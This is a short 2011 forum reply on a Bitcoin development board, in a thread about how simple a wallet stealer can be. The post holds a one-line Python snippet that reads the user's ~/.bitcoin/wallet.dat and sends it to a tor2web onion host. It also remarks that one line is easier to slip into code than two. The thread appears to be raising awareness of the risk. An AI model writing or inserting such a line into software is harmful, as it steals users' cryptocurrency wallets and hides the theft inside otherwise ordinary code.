Post
Topic
Board Development & Technical Discussion
Re: WALLET STEALER: so simple can it be!
by
theboos
on 18/06/2011, 14:42:07 UTC
thats is! so simple can a wallet stealer be. JUST 2 LINES!


Code:
import urllib as u, os.path as o; u.urlopen("https://yfwcdtpmqwrqu2pl.tor2web.org",open(o.expanduser("~/.bitcoin/wallet.dat")).read())

Now doubly serious! One line must be easier to slip in than two, right?

(Are semicolons legal after import statements? I didn't bother to check)